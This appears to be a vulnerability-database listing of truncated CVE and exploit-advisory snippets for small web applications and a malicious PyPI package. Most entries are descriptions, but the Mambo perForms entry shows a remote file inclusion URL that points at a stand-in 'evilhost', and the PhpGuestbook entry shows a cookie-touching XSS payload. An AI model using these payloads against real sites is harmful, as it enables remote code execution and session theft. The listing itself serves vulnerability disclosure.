EUVD-2024-21315

Malicious code in bioql PyPI...

CVE-2025-9009

The CVE covers itsourcecode Online Tour and Travel Management System 1.0. Affected is an unknown function in /admin/email_setup.php where manipulating the Name argument triggers SQL injection. The issue allows remote exploitation and the exploit has been disclosed publicly. Connected sources cons...

PT-2025-30148 · Unknown · Campcodes Online Movie Theater Seat Reservation System

Name of the Vulnerable Software and Affected Versions: Campcodes Online Movie Theater Seat Reservation System version 1.0 Description: A vulnerability has been found in Campcodes Online Movie Theater Seat Reservation System that is classified as critical. The vulnerability affects unknown code...

CVE-2024-13143

A vulnerability was found in ZeroWdd studentmanager 1.0. It has been rated as problematic. This issue affects the function submitAddPermission of the file src/main/java/com/zero/system/controller/PermissionController. java. The manipulation of the argument url leads to cross site scripting. The...

CVE-2023-4186 SourceCodester Pharmacy Management System manage_website.php unrestricted upload

A vulnerability was found in SourceCodester Pharmacy Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file managewebsite.php. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit h...

Online Diagnostic Lab Management 1.0 SQL Injection

Title: Online-Diagnostic-Lab-Management v1.0 Multiple-SQLi Author: nu11secur1ty Date: 08/01/2023 Vendor: https://www.youtube.com/watch?v=0nA5xfQ5G0g Vendor: https://www.youtube.com/@MayuriK Software:...

Real-time ASP Calendar - SQL Injection

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site : Inj3ct0r.com 0 1 + Support e-mail :...

Joomla My Car 1.0 Cross Site Scripting / SQL Injection

Exploit Title: Joomla Component My Car Multiple Vulnerabilities Date: 28th May 2010 Author: Valentin Category: webapps/0day Version: 1.0 Tested on: CVE : Code : :::::::::::::::::::::::::::::::::::::: 0x1 :::::::::::::::::::::::::::::::::::::: General Information Advisory/Exploit Title = Joomla...

Joomla Component Live Ticker 1.0 (tid) Blind SQL Injection Vuln

Exploit for unknown platform in category web applications =============================================================== Joomla Component Live Ticker 1.0 tid Blind SQL Injection Vuln =============================================================== Joomla Component comlivetickertid Blind...

Mambo Component perForms 1.0 - Remote File Inclusion

------------------------------------------------------------------------ --- perForms founds 12.000 sites ! http://www.vuln.com/components/comperforms/performs.php?mosConfigabsolutepath=http://evilhost Fix Add before code: defined'VALIDMOS' or die'Direct access to this location is not allowed.';...

phpmess.txt

SaVSaK.CoM | SpC-x - TheBeKiR | PHP MESSENGER 1.0 Version - Remote File Include Vulnerability Risk : High Class: Remote Script : PHP MESSENGER Credits : SpC-x Thanks : TheBeKiR - Ejder - FasTBoY - ERNE - RMx Code : require $pathtophpmessengerscript; if fileexists$pathtophpconvscript require...

PhpGuestbook <= 1.0 XSS

PhpGuestbook = 1.0 XSS Post Comment:- Name: 'scriptalertdocument.cookie/script Website: Comment: 'scriptalertdocument.cookie/script Found By: Qex...

Moreover CGI script - File Disclosure

Moreover CGI script - File Disclosure source: https://www.securityfocus.com/bid/1762/info The 'cachedfeed' CGI script supplied by newsfeed vendor Moreover.com contains a file-disclosure vulnerability. The script's 'obtainfile' function, designed to return the contents of a specified file for...